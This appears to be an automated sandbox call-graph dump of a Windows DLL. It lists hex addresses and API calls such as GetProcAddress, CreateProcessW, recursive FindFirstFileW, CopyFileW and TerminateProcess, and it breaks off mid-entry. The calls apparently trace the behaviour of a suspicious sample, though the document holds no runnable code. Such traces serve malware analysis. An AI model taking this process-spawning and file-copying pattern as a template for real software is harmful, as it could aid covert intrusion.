API calls 14285->14286 14287 6b935936 14286->14287 14288 6b930444 __freea 14 API calls 14287->14288 14289 6b935941 14288->14289 14290 6b930444 __freea 14 API calls 14289->14290 14290->14256 14291->14180 14293 6b926774 14292->14293 14299 6b9251e8 14292->14299 14300 6b927973 14293->14300 14296 6b9279ae ___vcrt_FlsSetValue 6 API calls 14297 6b92678a 14296->14297 14305 6b92674e 14297->14305 14299->13754 14301 6b927812 ___vcrt_FlsGetValue 5 API calls 14300->14301 14302 6b92798d 14301->14302 14303 6b9279a5 TlsGetValue 14302->14303 14304 6b92677b 14302->14304 14303->14304 14304->14296 14306 6b926765 14305->14306 14307 6b926758 14305->14307 14306->14299 14307->14306 14309 6b92d5ab 14307->14309 14310 6b930444 __freea 14 API calls 14309->14310 14311 6b92d5c3 14310->14311 14311->14306 14318 6b9267a3 14312->14318 14314 6b9251c4 14314->13781 14315 6b92ecb3 14314->14315 14316 6b92f5e8 __dosmaperr 14 API calls 14315->14316 14317 6b9251d0 14316->14317 14317->13779 14317->13780 14319 6b9267af GetLastError 14318->14319 14320 6b9267ac 14318->14320 14321 6b927973 ___vcrt_FlsGetValue 6 API calls 14319->14321 14320->14314 14322 6b9267c4 14321->14322 14323 6b926829 SetLastError 14322->14323 14324 6b9279ae ___vcrt_FlsSetValue 6 API calls 14322->14324 14331 6b9267e3 14322->14331 14323->14314 14325 6b9267dd __InternalCxxFrameHandler 14324->14325 14326 6b926805 14325->14326 14327 6b9279ae ___vcrt_FlsSetValue 6 API calls 14325->14327 14325->14331 14328 6b9279ae ___vcrt_FlsSetValue 6 API calls 14326->14328 14329 6b926819 14326->14329 14327->14326 14328->14329 14330 6b92d5ab ___std_exception_copy 14 API calls 14329->14330 14330->14331 14331->14323 14333 6b921012 14332->14333 14334 6b921010 14332->14334 14358 6b924402 14333->14358 14338 6b925224 ___scrt_release_startup_lock 14337->14338 14339 6b925228 14338->14339 14342 6b925234 __DllMainCRTStartup@12 14338->14342 15887 6b92eb1d 14339->15887 14341 6b925232 14341->13788 14343 6b925241 14342->14343 15891 6b92e306 14342->15891 14343->13788 15960 6b9266da RtlInterlockedFlushSList 14346->15960 14350 6b9253cc 14349->14350 14351 6b924d09 14350->14351 15964 6b92ecc6 14350->15964 14355 6b924d45 14351->14355 14353 6b9253da 14354 6b92672f ___scrt_uninitialize_crt 7 API calls 14353->14354 14354->14351 16038 6b925242 14355->16038 14359 6b924430 __fread_nolock 14358->14359 14404 6b92171f 14359->14404 14363 6b924456 __DllMainCRTStartup@12 _strlen 14427 6b921075 14363->14427 14366 6b92d5ab ___std_exception_copy 14 API calls 14367 6b9244b9 GetEnvironmentVariableW 14366->14367 14368 6b921135 __DllMainCRTStartup@12 44 API calls 14367->14368 14369 6b9244e6 __DllMainCRTStartup@12 _strlen 14368->14369 14370 6b921075 __DllMainCRTStartup@12 43 API calls 14369->14370 14371 6b924545 14370->14371 14372 6b92d5ab ___std_exception_copy 14 API calls 14371->14372 14373 6b924550 14372->14373 14374 6b921135 __DllMainCRTStartup@12 44 API calls 14373->14374 14375 6b924567 __DllMainCRTStartup@12 _strlen 14374->14375 14376 6b921075 __DllMainCRTStartup@12 43 API calls 14375->14376 14377 6b9245bc 14376->14377 14378 6b92d5ab ___std_exception_copy 14 API calls 14377->14378 14379 6b9245c7 14378->14379 14380 6b921135 __DllMainCRTStartup@12 44 API calls 14379->14380 14381 6b9245de __DllMainCRTStartup@12 _strlen 14380->14381 14382 6b921075 __DllMainCRTStartup@12 43 API calls 14381->14382 14383 6b924636 14382->14383 14384 6b92d5ab ___std_exception_copy 14 API calls 14383->14384 14385 6b924641 14384->14385 14430 6b92192f 14385->14430 14388 6b921135 __DllMainCRTStartup@12 44 API calls 14389 6b92467b __DllMainCRTStartup@12 _strlen 14388->14389 14390 6b921075 __DllMainCRTStartup@12 43 API calls 14389->14390 14391 6b9246da 14390->14391 14392 6b92d5ab ___std_exception_copy 14 API calls 14391->14392 14393 6b9246e5 14392->14393 14394 6b921135 __DllMainCRTStartup@12 44 API calls 14393->14394 14395 6b9246fc __DllMainCRTStartup@12 _strlen 14394->14395 14396 6b921075 __DllMainCRTStartup@12 43 API calls 14395->14396 14397 6b924758 14396->14397 14398 6b92d5ab ___std_exception_copy 14 API calls 14397->14398 14399 6b924763 14398->14399 14452 6b921b85 14399->14452 14401 6b924782 14490 6b924ad5 14401->14490 14403 6b921017 ExitProcess 14497 6b926180 14404->14497 14407 6b921135 __DllMainCRTStartup@12 44 API calls 14408 6b921775 __DllMainCRTStartup@12 _strlen 14407->14408 14409 6b9217d8 GetProcAddress 14408->14409 14410 6b92d5ab ___std_exception_copy 14 API calls 14409->14410 14411 6b9217f5 14410->14411 14412 6b921135 __DllMainCRTStartup@12 44 API calls 14411->14412 14413 6b921806 __DllMainCRTStartup@12 _strlen 14412->14413 14414 6b921869 GetProcAddress 14413->14414 14415 6b92d5ab ___std_exception_copy 14 API calls 14414->14415 14416 6b921886 14415->14416 14417 6b921135 __DllMainCRTStartup@12 44 API calls 14416->14417 14418 6b921897 __DllMainCRTStartup@12 _strlen 14417->14418 14419 6b9218fa GetProcAddress 14418->14419 14420 6b92d5ab ___std_exception_copy 14 API calls 14419->14420 14421 6b921917 14420->14421 14422 6b924ad5 _ValidateLocalCookies 5 API calls 14421->14422 14423 6b921927 14422->14423 14424 6b921135 14423->14424 14499 6b9210f5 14424->14499 14622 6b921035 14427->14622 14431 6b921957 __fread_nolock 14430->14431 14432 6b921135 __DllMainCRTStartup@12 44 API calls 14431->14432 14433 6b9219b3 __DllMainCRTStartup@12 _strlen 14432->14433 14434 6b921075 __DllMainCRTStartup@12 43 API calls 14433->14434 14435 6b921a0b 14434->14435 14436 6b92d5ab ___std_exception_copy 14 API calls 14435->14436 14437 6b921a16 14436->14437 14438 6b921075 __DllMainCRTStartup@12 43 API calls 14437->14438 14439 6b921a3a CreateProcessW 14438->14439 14442 6b921a6f __fread_nolock 14439->14442 14451 6b921a68 14439->14451 14440 6b924ad5 _ValidateLocalCookies 5 API calls 14441 6b921b7d Sleep Sleep 14440->14441 14441->14388 14443 6b921135 __DllMainCRTStartup@12 44 API calls 14442->14443 14444 6b921aba __DllMainCRTStartup@12 _strlen 14443->14444 14445 6b921075 __DllMainCRTStartup@12 43 API calls 14444->14445 14446 6b921b0f 14445->14446 14447 6b92d5ab ___std_exception_copy 14 API calls 14446->14447 14448 6b921b1a 14447->14448 14449 6b921075 __DllMainCRTStartup@12 43 API calls 14448->14449 14450 6b921b3c CreateProcessW 14449->14450 14450->14451 14451->14440 14453 6b921bca __DllMainCRTStartup@12 14452->14453 14454 6b921075 __DllMainCRTStartup@12 43 API calls 14453->14454 14455 6b921bfd FindFirstFileW 14454->14455 14456 6b921c21 14455->14456 14457 6b921fbf 14456->14457 14467 6b921c2b 14456->14467 15077 6b9232d8 14457->15077 14458 6b921c47 14458->14401 14460 6b921fd2 14461 6b9232d8 __DllMainCRTStartup@12 39 API calls 14460->14461 14462 6b921fe1 14461->14462 14464 6b924ad5 _ValidateLocalCookies 5 API calls 14462->14464 14463 6b921fa5 FindNextFileW 14463->14458 14463->14467 14466 6b921ffc 14464->14466 14465 6b921075 __DllMainCRTStartup@12 43 API calls 14465->14467 14466->14401 14467->14458 14467->14463 14467->14465 14468 6b921b85 __DllMainCRTStartup@12 110 API calls 14467->14468 14474 6b921d10 __DllMainCRTStartup@12 _strlen 14467->14474 14468->14467 14469 6b921135 __DllMainCRTStartup@12 44 API calls 14469->14474 14470 6b921075 __DllMainCRTStartup@12 43 API calls 14471 6b921f5e TerminateProcess CloseHandle CloseHandle 14470->14471 15034 6b922004 14471->15034 14474->14469 14474->14470 14475 6b921075 __DllMainCRTStartup@12 43 API calls 14474->14475 14476 6b92d5ab ___std_exception_copy 14 API calls 14474->14476 14475->14474 14477 6b921d89 ExpandEnvironmentStringsW 14476->14477 14740 6b923389 14477->14740 14481 6b9232d8 39 API calls __DllMainCRTStartup@12 14486 6b921db2 14481->14486 14483 6b923389 __DllMainCRTStartup@12 40 API calls 14483->14486 14484 6b9233f1 40 API calls __DllMainCRTStartup@12 14484->14486 14486->14481 14486->14483 14486->14484 14488 6b921075 __DllMainCRTStartup@12 43 API calls 14486->14488 14744 6b923854 14486->14744 14747 6b9232f1 14486->14747 14751 6b9232c2 14486->14751 14754 6b9216ba 14486->14754 14758 6b922430 CoInitialize 76CCE550 14486->14758 14489 6b921e9a CopyFileW TerminateProcess CloseHandle CloseHandle 14488->14489 14489->14467 14491 6b924ade IsProcessorFeaturePresent 14490->14491 14492 6b924add 14490->14492 14494 6b924f19 14491->14494 14492->14403 15886 6b924edc SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 14494->15886 14496 6b924ffc 14496->14403 14498 6b92174a GetModuleHandleW 14497->14498 14498->14407 14500 6b92110e __vfwprintf_l 14499->14500 14503 6b92c72b 14500->14503 14504 6b92c73f __vfwprintf_l 14503->14504 14509 6b928541 14504->14509 14507 6b927d4e __vfwprintf_l 39 API calls 14508 6b921118 14507->14508 14508->14363 14510 6b92854d 14509->14510 14512 6b928570 14509->14512 14511 6b92de7c __vfwprintf_l 29 API calls 14510->14511 14515 6b928568 14511->14515 14516 6b928597 14512->14516 14517 6b92824a 14512->14517 14513 6b92de7c __vfwprintf_l 29 API calls 14513->14515 14515->14507 14516->14513 14516->14515 14518 6b928276 14517->14518 14519 6b928299 14517->14519 14520 6b92de7c __vfwprintf_l 29 API calls 14518->14520 14519->14518 14523 6b9282a1 __vfwprintf_l 14519->14523 14521 6b92828e 14520->14521 14522 6b924ad5 _ValidateLocalCookies 5 API calls 14521->14522 14524 6b9283bc 14522->14524 14528 6b92a71b 14523->14528 14524->14516 14545 6b92c3ce 14528->14545 14530 6b928322 14542 6b92a12f 14530->14542 14531 6b92de7c __vfwprintf_l 29 API calls 14531->14530 14532 6b92a740 14532->14531 14537 6b92a735 __vfwprintf_l __DllMainCRTStartup@12 14537->14530 14537->14532 14538 6b92a844 14537->14538 14549 6b92c320 14537->14549 14556 6b92a379 14537->14556 14559 6b92ad98 14537->14559 14593 6b92b3bd 14537->14593 14539 6b92de7c __vfwprintf_l 29 API calls 14538->14539 14540 6b92a85e 14539->14540 14541 6b92de7c __vfwprintf_l 29 API calls 14540->14541 14541->14530 14543 6b930444 __freea 14 API calls 14542->14543 14544 6b92a13f 14543->14544 14544->14521 14546 6b92c3f2 14545->14546 14547 6b92c3d9 14545->14547 14546->14537 14548 6b92de7c __vfwprintf_l 29 API calls 14547->14548 14548->14546 14550 6b928197 __vfwprintf_l 39 API calls 14549->14550 14551 6b92c330 14550->14551 14552 6b9304f9 __vfwprintf_l 39 API calls 14551->14552 14553 6b92c34d 14552->14553 14554 6b930557 __vfwprintf_l 39 API calls 14553->14554 14555 6b92c35a 14554->14555 14555->14537 14557 6b92887c __vfwprintf_l 39 API calls 14556->14557 14558 6b92a3b4 14557->14558 14558->14537 14560 6b92adb6 14559->14560 14561 6b92ad9f 14559->14561 14562 6b92de7c __vfwprintf_l 29 API calls 14560->14562 14574 6b92adf5 14560->14574 14563 6b92b442 14561->14563 14564 6b92b3e2 14561->14564 14561->14574 14567 6b92adea 14562->14567 14568 6b92b447 14563->14568 14569 6b92b47b 14563->14569 14565 6b92b468 14564->14565 14566 6b92b3e8 14564->14566 14577 6b92939b __vfwprintf_l 30 API calls 14565->14577 14580 6b92b3ed 14566->14580 14581 6b92b439 14566->14581 14567->14537 14570 6b92b474 14568->14570 14571 6b92b449 14568->14571 14572 6b92b480 14569->14572 14573 6b92b498 14569->14573 14578 6b92c124 __vfwprintf_l 30 API calls 14570->14578 14576 6b92b3fc 14571->14576 14583 6b92b458 14571->14583 14572->14565 14572->14581 14592 6b92b413 __vfwprintf_l __DllMainCRTStartup@12 14572->14592 14575 6b92c15e __vfwprintf_l 30 API calls 14573->14575 14574->14537 14575->14592 14579 6b92bc2a __vfwprintf_l 42 API calls 14576->14579 14591 6b92b4a1 __DllMainCRTStartup@12 14576->14591 14577->14592 14578->14592 14579->14592 14580->14576 14584 6b92b426 14580->14584 14580->14592 14582 6b9296ba __vfwprintf_l 30 API calls 14581->14582 14581->14591 14582->14592 14583->14565 14585 6b92b45c 14583->14585 14586 6b92bf62 __vfwprintf_l 41 API calls 14584->14586 14584->14591 14588 6b92c09f __vfwprintf_l 29 API calls 14585->14588 14585->14591 14586->14592 14587 6b924ad5 _ValidateLocalCookies 5 API calls 14589 6b92b71a 14587->14589 14588->14592 14589->14537 14590 6b9310e1 __vfwprintf_l 41 API calls 14590->14592 14591->14587 14592->14590 14592->14591 14594 6b92b442 14593->14594 14595 6b92b3e2 14593->14595 14598 6b92b447 14594->14598 14599 6b92b47b 14594->14599 14596 6b92b468 14595->14596 14597 6b92b3e8 14595->14597 14605 6b92939b __vfwprintf_l 30 API calls 14596->14605 14609 6b92b3ed 14597->14609 14610 6b92b439 14597->14610 14600 6b92b474 14598->14600 14601 6b92b449 14598->14601 14602 6b92b480 14599->14602 14603 6b92b498 14599->14603 14606 6b92c124 __vfwprintf_l 30 API calls 14600->14606 14607 6b92b3fc 14601->14607 14613 6b92b458 14601->14613 14602->14596 14602->14610 14620 6b92b413 __vfwprintf_l __DllMainCRTStartup@12 14602->14620 14604 6b92c15e __vfwprintf_l 30 API calls 14603->14604 14604->14620 14605->14620 14606->14620 14608 6b92bc2a __vfwprintf_l 42 API calls 14607->14608 14619 6b92b4a1 __DllMainCRTStartup@12 14607->14619 14608->14620 14609->14607 14611 6b92b426 14609->14611 14609->14620 14612 6b9296ba __vfwprintf_l 30 API calls 14610->14612 14610->14619 14615 6b92bf62 __vfwprintf_l 41 API calls 14611->14615 14611->14619 14612->14620 14613->14596 14614 6b92b45c 14613->14614 14617 6b92c09f __vfwprintf_l 29 API calls 14614->14617 14614->14619 14615->14620 14616 6b924ad5 _ValidateLocalCookies 5 API calls 14618 6b92b71a 14616->14618 14617->14620 14618->14537 14619->14616 14620->14619 14621 6b9310e1 __vfwprintf_l 41 API calls 14620->14621 14621->14620 14623 6b92104e __vfwprintf_l 14622->14623 14626 6b92c76c 14623->14626 14627 6b92c780 __vfwprintf_l 14626->14627 14632 6b9285e0 14627->14632 14630 6b927d4e __vfwprintf_l 39 API calls 14631 6b921058 14630->14631 14631->14366 14633 6b92860f 14632->14633 14634 6b9285ec 14632->14634 14638 6b928636 14633->14638 14640 6b9283be 14633->14640 14635 6b92de7c __vfwprintf_l 29 API calls 14634->14635 14639 6b928607 14635->14639 14637 6b92de7c __vfwprintf_l 29 API calls 14637->14639 14638->14637 14638->14639 14639->14630 14641 6b9283ea 14640->14641 14642 6b92840d 14640->14642 14643 6b92de7c __vfwprintf_l 29 API calls 14641->14643 14642->14641 14644 6b928415 __DllMainCRTStartup@12 14642->14644 14650 6b928402 14643->14650 14651 6b92a9ff 14644->14651 14645 6b924ad5 _ValidateLocalCookies 5 API calls 14646 6b92853f 14645->14646 14646->14638 14648 6b92a12f __vfwprintf_l 14 API calls 14648->14650 14650->14645 14652 6b92c3ce __DllMainCRTStartup@12 29 API calls 14651->14652 14655 6b92aa14 __DllMainCRTStartup@12 14652->14655 14653 6b928496 14653->14648 14654 6b92aa1f 14656 6b92de7c __vfwprintf_l 29 API calls 14654->14656 14655->14653 14655->14654 14660 6b92a3f1 14655->14660 14663 6b92aef1 14655->14663 14704 6b92b71c 14655->14704 14656->14653 14661 6b928a8b __DllMainCRTStartup@12 39 API calls 14660->14661 14662 6b92a42e 14661->14662 14662->14655 14664 6b92af17 14663->14664 14665 6b92aeff 14663->14665 14666 6b92af58 14664->14666 14669 6b92de7c __vfwprintf_l 29 API calls 14664->14669 14665->14666 14667 6b92b7b4 14665->14667 14668 6b92b74a 14665->14668 14666->14655 14672 6b92b7f3 14667->14672 14673 6b92b7b9 14667->14673 14670 6b92b750 14668->14670 14671 6b92b7dc 14668->14671 14674 6b92af4c 14669->14674 14675 6b92b781 14670->14675 14676 6b92b755 14670->14676 14682 6b929528 __DllMainCRTStartup@12 30 API calls 14671->14682 14677 6b92b812 14672->14677 14678 6b92b7f8 14672->14678 14679 6b92b7ea 14673->14679 14680 6b92b7bb 14673->14680 14674->14655 14684 6b92b75b 14675->14684 14689 6b92b7a9 14675->14689 14681 6b92b809 14676->14681 14676->14684 14686 6b92c174 __DllMainCRTStartup@12 30 API calls 14677->14686 14678->14681 14685 6b92b7fd 14678->14685 14683 6b92c141 __DllMainCRTStartup@12 30 API calls 14679->14683 14687 6b92b763 14680->14687 14691 6b92b7ca 14680->14691 14690 6b92c1fc __DllMainCRTStartup@12 39 API calls 14681->14690 14699 6b92b77c __DllMainCRTStartup@12 14682->14699 14683->14699 14684->14687 14692 6b92b78e 14684->14692 14684->14699 14685->14671 14685->14689 14686->14699 14688 6b92bdbb __DllMainCRTStartup@12 42 API calls 14687->14688 14702 6b92b81d __DllMainCRTStartup@12 14687->14702 14688->14699 14693 6b929847 __DllMainCRTStartup@12 30 API calls 14689->14693 14689->14702 14690->14699 14691->14671 14694 6b92b7ce 14691->14694 14695 6b92bff7 __DllMainCRTStartup@12 40 API calls 14692->14695 14692->14702 14693->14699 14697 6b92c09f __vfwprintf_l 29 API calls 14694->14697 14694->14702 14695->14699 14696 6b924ad5 _ValidateLocalCookies 5 API calls 14698 6b92bb0e 14696->14698 14697->14699 14698->14655 14700 6b92c320 __vfwprintf_l 39 API calls 14699->14700 14699->14702 14703 6b92b9fd 14699->14703 14700->14703 14701 6b93124b __wsopen_s 40 API calls 14701->14703 14702->14696 14703->14701 14703->14702 14705 6b92b7b4 14704->14705 14706 6b92b74a 14704->14706 14709 6b92b7f3 14705->14709 14710 6b92b7b9 14705->14710 14707 6b92b750 14706->14707 14708 6b92b7dc 14706->14708 14711 6b92b781 14707->14711 14712 6b92b755 14707->14712 14719 6b929528 __DllMainCRTStartup@12 30 API calls 14708->14719 14713 6b92b812 14709->14713 14714 6b92b7f8 14709->14714 14715 6b92b7ea 14710->14715 14716 6b92b7bb 14710->14716 14721 6b92b75b 14711->14721 14726 6b92b7a9 14711->14726 14717 6b92b809 14712->14717 14712->14721 14718 6b92c174 __DllMainCRTStartup@12 30 API calls 14713->14718 14714->14717 14722 6b92b7fd 14714->14722 14720 6b92c141 __DllMainCRTStartup@12 30 API calls 14715->14720 14723 6b92b763 14716->14723 14728 6b92b7ca 14716->14728 14724 6b92c1fc __DllMainCRTStartup@12 39 API calls 14717->14724 14735 6b92b77c __DllMainCRTStartup@12 14718->14735 14719->14735 14720->14735 14721->14723 14727 6b92b78e 14721->14727 14721->14735 14722->14708 14722->14726 14725 6b92bdbb __DllMainCRTStartup@12 42 API calls 14723->14725 14738 6b92b81d __DllMainCRTStartup@12 14723->14738 14724->14735 14725->14735 14729 6b929847 __DllMainCRTStartup@12 30 API calls 14726->14729 14726->14738 14731 6b92bff7 __DllMainCRTStartup@12 40 API calls 14727->14731 14727->14738 14728->14708 14730 6b92b7ce 14728->14730 14729->14735 14733 6b92c09f __vfwprintf_l 29 API calls 14730->14733 14730->14738 14731->14735 14732 6b924ad5 _ValidateLocalCookies 5 API calls 14734 6b92bb0e 14732->14734 14733->14735 14734->14655 14736 6b92c320 __vfwprintf_l 39 API calls 14735->14736 14735->14738 14739 6b92b9fd 14735->14739 14736->14739 14737 6b93124b __wsopen_s 40 API calls 14737->14739 14738->14732 14739->14737 14739->14738 14741 6b9233bb __DllMainCRTStartup@12 14740->14741 15080 6b9238b4 14741->15080 15142 6b923cbc 14744->15142 14746 6b923869 __DllMainCRTStartup@12 14746->14486 14748 6b923302 __DllMainCRTStartup@12 14747->14748 14750 6b923308 __DllMainCRTStartup@12 14748->14750 15182 6b9234ca 14748->15182 14750->14486 15186 6b92329b 14751->15186 14755 6b9216ca __DllMainCRTStartup@12 14754->14755 14756 6b9232d8 __DllMainCRTStartup@12 39 API calls 14755->14756 14757 6b92171a 14756->14757 14757->14486 14759 6b92249a 14758->14759 14760 6b9224eb 14758->14760 15207 6b9210c5 14759->15207 15211 6b9233f1 14760->15211 14765 6b9232d8 __DllMainCRTStartup@12 39 API calls 14767 6b9224c5 14765->14767 14769 6b9232d8 __DllMainCRTStartup@12 39 API calls 14767->14769 14771 6b9224d1 14769->14771 14773 6b9232d8 __DllMainCRTStartup@12 39 API calls 14771->14773 14772 6b922519 15223 6b921654 VariantInit 14772->15223 14850 6b9224e0 14773->14850 14775 6b92253e 15224 6b921654 VariantInit 14775->15224 14777 6b922563 15225 6b921654 VariantInit 14777->15225 14778 6b924ad5 _ValidateLocalCookies 5 API calls 14780 6b92325d 14778->14780 14780->14486 14781 6b922588 15226 6b9216a8 VariantClear 14781->15226 14783 6b9225fb 15227 6b9216a8 VariantClear 14783->15227 14785 6b92260a 15228 6b9216a8 VariantClear 14785->15228 14787 6b922619 15229 6b9216a8 VariantClear 14787->15229 14789 6b922628 14790 6b922690 14789->14790 14791 6b92262e 14789->14791 15230 6b921456 14790->15230 14792 6b9210c5 __DllMainCRTStartup@12 70 API calls 14791->14792 14794 6b92263b 76C9D120 14792->14794 14796 6b9232d8 __DllMainCRTStartup@12 39 API calls 14794->14796 14798 6b922661 14796->14798 14797 6b9226a1 __DllMainCRTStartup@12 15235 6b9214e7 14797->15235 14800 6b9232d8 __DllMainCRTStartup@12 39 API calls 14798->14800 14802 6b92266d 14800->14802 14805 6b9232d8 __DllMainCRTStartup@12 39 API calls 14802->14805 14803 6b9226db 14806 6b9210c5 __DllMainCRTStartup@12 70 API calls 14803->14806 14804 6b92273d 14811 6b922766 14804->14811 14812 6b9227c8 14804->14812 14807 6b922679 14805->14807 14808 6b9226e8 76C9D120 14806->14808 14809 6b9232d8 __DllMainCRTStartup@12 39 API calls 14807->14809 14813 6b9232d8 __DllMainCRTStartup@12 39 API calls 14808->14813 14809->14850 14814 6b9210c5 __DllMainCRTStartup@12 70 API calls 14811->14814 14818 6b922851 14812->14818 14819 6b9227e4 14812->14819 14815 6b92270e 14813->14815 14816 6b922773 76C9D120 14814->14816 14817 6b9232d8 __DllMainCRTStartup@12 39 API calls 14815->14817 14826 6b9232d8 __DllMainCRTStartup@12 39 API calls 14816->14826 14820 6b92271a 14817->14820 14821 6b921456 __DllMainCRTStartup@12 4 API calls 14818->14821 14822 6b9210c5 __DllMainCRTStartup@12 70 API calls 14819->14822 14824 6b9232d8 __DllMainCRTStartup@12 39 API calls 14820->14824 14833 6b92285e __DllMainCRTStartup@12 14821->14833 14825 6b9227f1 76C9D120 14822->14825 14827 6b922726 14824->14827 14837 6b9232d8 __DllMainCRTStartup@12 39 API calls 14825->14837 14829 6b922799 14826->14829 14828 6b9232d8 __DllMainCRTStartup@12 39 API calls 14827->14828 14828->14850 14830 6b9232d8 __DllMainCRTStartup@12 39 API calls 14829->14830 14831 6b9227a5 14830->14831 14832 6b9232d8 __DllMainCRTStartup@12 39 API calls 14831->14832 14835 6b9227b1 14832->14835 14836 6b9214e7 __DllMainCRTStartup@12 SysFreeString 14833->14836 14838 6b9232d8 __DllMainCRTStartup@12 39 API calls 14835->14838 14839 6b92288e 14836->14839 14840 6b922822 14837->14840 14838->14850 14843 6b92289f 14839->14843 14844 6b92290c 14839->14844 14841 6b9232d8 __DllMainCRTStartup@12 39 API calls 14840->14841 14842 6b92282e 14841->14842 14845 6b9232d8 __DllMainCRTStartup@12 39 API calls 14842->14845 14846 6b9210c5 __DllMainCRTStartup@12 70 API calls 14843->14846 14849 6b922928 14844->14849 14861 6b922995 14844->14861 14847 6b92283a 14845->14847 14852 6b9228ac 76C9D120 14846->14852 14848 6b9232d8 __DllMainCRTStartup@12 39 API calls 14847->14848 14848->14850 14851 6b9210c5 __DllMainCRTStartup@12 70 API calls 14849->14851 14850->14778 14853 6b922935 76C9D120 14851->14853 14855 6b9232d8 __DllMainCRTStartup@12 39 API calls 14852->14855 14859 6b9232d8 __DllMainCRTStartup@12 39 API calls 14853->14859 14856 6b9228dd 14855->14856 14858 6b9232d8 __DllMainCRTStartup@12 39 API calls 14856->14858 14860 6b9228e9 14858->14860 14862 6b922966 14859->14862 14864 6b922a43 14861->14864 14865 6b9229d6 14861->14865 14866 6b9232d8 __DllMainCRTStartup@12 39 API calls 14862->14866 14873 6b922a5f 14864->14873 14874 6b922acc 14864->14874 14868 6b9210c5 __DllMainCRTStartup@12 70 API calls 14865->14868 14871 6b9229e3 76C9D120 14868->14871 14880 6b9232d8 __DllMainCRTStartup@12 39 API calls 14871->14880 14877 6b9210c5 __DllMainCRTStartup@12 70 API calls 14873->14877 14881 6b922b62 14874->14881 14882 6b922af5 14874->14882 14878 6b922a6c 76C9D120 14877->14878 14888 6b9232d8 __DllMainCRTStartup@12 39 API calls 14878->14888 14883 6b922a14 14880->14883 14894 6b922bfa 14881->14894 14895 6b922b8d 14881->14895 14884 6b9210c5 __DllMainCRTStartup@12 70 API calls 14882->14884 14887 6b922b02 76C9D120 14884->14887 14898 6b921456 __DllMainCRTStartup@12 4 API calls 14894->14898 14899 6b9210c5 __DllMainCRTStartup@12 70 API calls 14895->14899 15320 6b92cd5b 15034->15320 15038 6b924ad5 _ValidateLocalCookies 5 API calls 15040 6b921fa3 15038->15040 15040->14463 15045 6b92cd5b __DllMainCRTStartup@12 42 API calls 15046 6b92208f ___std_exception_copy 15045->15046 15348 6b92db99 15046->15348 15048 6b9220bb __DllMainCRTStartup@12 15351 6b92cb0d 15048->15351 15051 6b92d5ab ___std_exception_copy 14 API calls 15053 6b922129 __fread_nolock __DllMainCRTStartup@12 15051->15053 15052 6b922065 15052->15038 15053->15052 15054 6b92cb0d __DllMainCRTStartup@12 42 API calls 15053->15054 15055 6b92219c 15054->15055 15056 6b92d5ab ___std_exception_copy 14 API calls 15055->15056 15057 6b9221aa 15056->15057 15057->15052 15058 6b92cd5b __DllMainCRTStartup@12 42 API calls 15057->15058 15061 6b9221e5 __fread_nolock __DllMainCRTStartup@12 15058->15061 15059 6b92239e 15059->15052 15060 6b92cec7 __DllMainCRTStartup@12 69 API calls 15059->15060 15060->15052 15061->15052 15061->15059 15062 6b92cb0d __DllMainCRTStartup@12 42 API calls 15061->15062 15063 6b92227e 15062->15063 15064 6b92d5ab ___std_exception_copy 14 API calls 15063->15064 15065 6b922290 __fread_nolock __DllMainCRTStartup@12 15064->15065 15066 6b92cb0d __DllMainCRTStartup@12 42 API calls 15065->15066 15067 6b9222f5 15066->15067 15068 6b92d5ab ___std_exception_copy 14 API calls 15067->15068 15069 6b922307 ___std_exception_copy __DllMainCRTStartup@12 15068->15069 15070 6b92d5ab ___std_exception_copy 14 API calls 15069->15070 15071 6b922371 15070->15071 15357 6b92d4df 15071->15357 15078 6b9234ca __DllMainCRTStartup@12 39 API calls 15077->15078 15079 6b9232e7 __DllMainCRTStartup@12 15078->15079 15079->14460 15091 6b923c50 15080->15091 15084 6b9238df __DllMainCRTStartup@12 15088 6b923905 __DllMainCRTStartup@12 15084->15088 15098 6b923c2b 15084->15098 15089 6b924ad5 _ValidateLocalCookies 5 API calls 15088->15089 15090 6b9233db 15089->15090 15090->14486 15092 6b923c6b __DllMainCRTStartup@12 15091->15092 15093 6b924ad5 _ValidateLocalCookies 5 API calls 15092->15093 15094 6b9238d5 15093->15094 15094->15084 15095 6b92142c 15094->15095 15106 6b9248b3 15095->15106 15099 6b923c50 __DllMainCRTStartup@12 5 API calls 15098->15099 15100 6b923c3a 15099->15100 15120 6b923d08 15100->15120 15103 6b923f56 15124 6b9240a1 15103->15124 15111 6b924801 15106->15111 15110 6b9248d2 15117 6b9247b1 15111->15117 15114 6b926486 15115 6b9264a0 15114->15115 15116 6b9264cd RaiseException 15114->15116 15115->15116 15116->15110 15118 6b925b7e ___std_exception_copy 39 API calls 15117->15118 15119 6b9247dd 15118->15119 15119->15114 15121 6b923d29 __DllMainCRTStartup@12 15120->15121 15122 6b924ad5 _ValidateLocalCookies 5 API calls 15121->15122 15123 6b923966 15122->15123 15123->15103 15127 6b9240b3 15124->15127 15132 6b9240fa 15127->15132 15133 6b924113 15132->15133 15134 6b9240c2 15132->15134 15135 6b921339 __DllMainCRTStartup@12 RaiseException 15133->15135 15136 6b9240ce 15134->15136 15135->15134 15137 6b9240e5 15136->15137 15138 6b9240da 15136->15138 15140 6b923f70 15137->15140 15141 6b92139b __DllMainCRTStartup@12 RaiseException RtlEnterCriticalSection RtlLeaveCriticalSection 15137->15141 15139 6b92411f __DllMainCRTStartup@12 40 API calls 15138->15139 15139->15140 15140->15088 15141->15140 15143 6b923ccb __DllMainCRTStartup@12 15142->15143 15146 6b923d6a 15143->15146 15145 6b923ce2 15145->14746 15151 6b923f02 15146->15151 15150 6b923db1 __DllMainCRTStartup@12 15150->15145 15152 6b923f14 15151->15152 15153 6b923d7e 15151->15153 15168 6b923f1d 15152->15168 15153->15150 15155 6b923f85 15153->15155 15156 6b923c50 __DllMainCRTStartup@12 5 API calls 15155->15156 15157 6b923faf 15156->15157 15158 6b923fbc 15157->15158 15159 6b92142c __DllMainCRTStartup@12 40 API calls 15157->15159 15160 6b923c2b __DllMainCRTStartup@12 5 API calls 15158->15160 15159->15158 15161 6b923fd9 __DllMainCRTStartup@12 15160->15161 15162 6b923f56 __DllMainCRTStartup@12 40 API calls 15161->15162 15163 6b923ff3 __DllMainCRTStartup@12 15162->15163 15165 6b92405b __DllMainCRTStartup@12 15163->15165 15176 6b92377a 15163->15176 15166 6b924ad5 _ValidateLocalCookies 5 API calls 15165->15166 15167 6b92409d 15166->15167 15167->15150 15171 6b9248d3 15168->15171 15172 6b924856 std::invalid_argument::invalid_argument 39 API calls 15171->15172 15173 6b9248e4 15172->15173 15174 6b926486 std::_Xinvalid_argument RaiseException 15173->15174 15175 6b9248f2 15174->15175 15179 6b923839 15176->15179 15180 